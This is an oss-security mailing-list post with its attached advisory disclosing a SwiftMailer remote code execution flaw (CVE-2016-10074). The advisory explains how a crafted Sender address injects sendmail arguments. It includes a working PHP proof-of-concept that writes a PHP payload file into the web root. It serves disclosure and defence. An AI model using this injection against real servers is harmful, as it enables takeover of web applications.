[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
From: Dawid Golunski <dawid () legalhackers ! com>
Date: 2016-12-28 18:57:28
Message-ID: CADSYzst+JoCY41vHZeRGXLGGDmBxSjq2r9CHCDyi4y2JHEewjQ () mail ! gmail ! com
[Download RAW message or body]
SwiftMailer <= 5.4.5-DEV Remote Code Execution
CVE-2016-10074
Discovered by: Dawid Golunski (@dawid_golunski)
https://legalhackers.com
Desc:
An independent research uncovered a critical vulnerability in SwiftMailer that
could potentially be used by (unauthenticated) remote attackers to achieve
remote arbitrary code execution in the context of the web server user and
remotely compromise the target web application.
To exploit the vulnerability an attacker could target common website
components such as contact/feedback forms, registration forms, password
email resets and others that send out emails with the help of a vulnerable
version of the SwiftMailer class.
Despite the significant efforts in responsibly disclosing the vulnerability
to the vendor (since 2nd December).
The vulnerability remains unfixed as of 28 December.
The full current advisory at:
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html
Copy attached to this msg.
The Video PoC will be very similar to:
http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
The SwiftMailer PoC exploit:
https://legalhackers.com/exploits/CVE-2016-10074/SwiftMailer_PoC_RCE_Exploit.txt
Updates:
https://twitter.com/dawid_golunski
--
Regards,
Dawid Golunski
https://legalhackers.com
t: @dawid_golunski
["SwiftMailer-Exploit.txt" (text/plain)]
__ __ __ __ __
/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
/____/
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- CVE-2016-10074
- Release date: 28.12.2016
- Revision 1.0
- Severity: Critical
=============================================
I. VULNERABILITY
-------------------------
SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
II. BACKGROUND
-------------------------
"Swift Mailer is a component-based library for sending e-mails from PHP applications."
"Swift Mailer began back in 2005 as a one-class project for sending mail over SMTP.
It has since grown into the flexible component-based library that is in development today."
SwiftMailer library is used by major PHP projects including some of the
most popular PHP programming frameworks such as Yii2, Laravel, Symfony.
https://github.com/swiftmailer/swiftmailer/blob/5.x/doc/introduction.rst
https://github.com/swiftmailer/swiftmailer/blob/5.x/doc/overview.rst
Symfony / Yii / Laravel frameworks:
http://symfony.com/doc/current/email.html
https://github.com/yiisoft/yii2-swiftmailer
https://laravel.com/docs/5.1/mail
III. INTRODUCTION
-------------------------
An independent research uncovered a critical vulnerability in SwiftMailer that
could potentially be used by (unauthenticated) remote attackers to achieve
remote arbitrary code execution in the context of the web server user and
remotely compromise the target web application.
To exploit the vulnerability an attacker could target common website
components such as contact/feedback forms, registration forms, password
email resets and others that send out emails with the help of a vulnerable
version of the SwiftMailer class.
Despite the significant efforts in responsibly disclosing the vulnerability
to the vendor. The vulnerability remains unfixed as of 28 December.
Note: This advisory is limited.
Remaining attack vectors/exploits will be disclosed at a later date to allow
more time for patching.
IV. DESCRIPTION
-------------------------
SwiftMailer class uses PHP mail() function as its default transport.
SwiftMailer suffers from the same vulnerability as the one disclosed in
PHPMailer:
http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
The following Sender address:
"Attacker -Param2 -Param3"@test.com
would cause SwiftMailer/mail() function to execute /usr/bin/sendmail with the
following list of arguments:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker -Param2 -Param3@test.com]
which would not work for the attacker (Param2 and Param3 are passed within
the same argument of argv[3] )
Attackers can however break out of parameter no.3 with some extra escaping.
For example, by injecting an extra sequence of \" after the first argument,
the following Sender email:
"Attacker \" -Param2 -Param3"@test.com
when passed to SwiftMailer (and eventually to mail()) function would cause
sendmail to execute with:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker\]
Arg no. 4 == [-Param2]
Arg no. 5 == [-Param3"@test.com]
Which as can be seen would inject additional parameters of 4 & 5 to sendmail.
Attackers can exploit this to achieve code execution as shown in the PoC
below.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
<?php
/*
SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
Discovered/Coded by:
Dawid Golunski
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html
Video PoC
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
Follow the feed for updates:
https://twitter.com/dawid_golunski
A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == ["@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.
The resulting file will contain the payload passed in the body of the msg:
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<
See the full advisory URL for the exploit details.
*/
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// ------------------
// mail() param injection via the vulnerability in SwiftMailer
require_once 'lib/swift_required.php';
// Mail transport
$transport = Swift_MailTransport::newInstance();
// Create the Mailer using your created Transport
$mailer = Swift_Mailer::newInstance($transport);
// Create a message
$message = Swift_Message::newInstance('Swift PoC exploit')
->setFrom(array($email_from => 'PoC Exploit Payload'))
->setTo(array('receiver@domain.org', 'other@domain.org' => 'A name'))
->setBody('Here is the message itself')
;
// Send the message with PoC payload in 'from' field
$result = $mailer->send($message);
~~~~~~~~~~~
The researcher also developed an Unauthenticated RCE exploit for a popular
open-source application (deployed on the Internet on more than a million servers)
as a PoC for real-world exploitation. It might be published after the vendor has
fixed the vulnerabilities.
Video PoC:
~~~~~~~~~~~~~
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
VI. BUSINESS IMPACT
-------------------------
A successful exploitation could let remote attackers to gain access to
the target server in the context of the web server account which could
lead to a full compromise of the web application.
VII. SYSTEMS AFFECTED
-------------------------
All versions of SwiftMailer including the latest of 5.4.5-DEV are affected.
VIII. SOLUTION / VENDOR RESPONSE
-------------------------
The vulnerability was responsibly disclosed to SwiftMailer vendor.
The first contact attempts started on the 2nd of December.
Unfortunatelly the vendor has not fixed the SwiftMailer library to date and
it remains vulnerable.
Because of this users of SwiftMailer (which includes various frameworks that make
use of the library) remain at risk.
The vendor was advised by the researcher of the upcoming exploit for another
library (PHPMailer) which, when published along with the new release, would make
it possible for malicious users to "connect the dots" and use the same payloads
to attack SwiftMailer users.
The last attempt of contact (resending the tested PoC exploit) was made on Dec 26th
to which the vendor have not replied.
As after the publication of PHPMailer exploit other users did start to see the
similarities and file public vulnerability reports, there is no more point in
keeping this advisory private.
CVE MITRE assigned the following ID to this vulnerability:
CVE-2016-10074
upon the request made by the researcher.
IX. REFERENCES
-------------------------
https://legalhackers.com
This (CVE-2016-10074) advisory:
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
Video PoC:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
Exploit code:
Simple PoC shown above is available here:
https://legalhackers.com/exploits/CVE-2016-10074/SwiftMailer_PoC_RCE_Exploit.txt
Other exploits with other attack vectors will be disclosed at a later date to
allow more time for patching.
CVE-2016-10074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10074
SwiftMailer github
https://github.com/swiftmailer/swiftmailer
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
https://legalhackers.com
Thanks to SecuriTeam for help with disclosing the vulnerability to the vendor.
XI. REVISION HISTORY
-------------------------
28.12.2016 - Limited advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic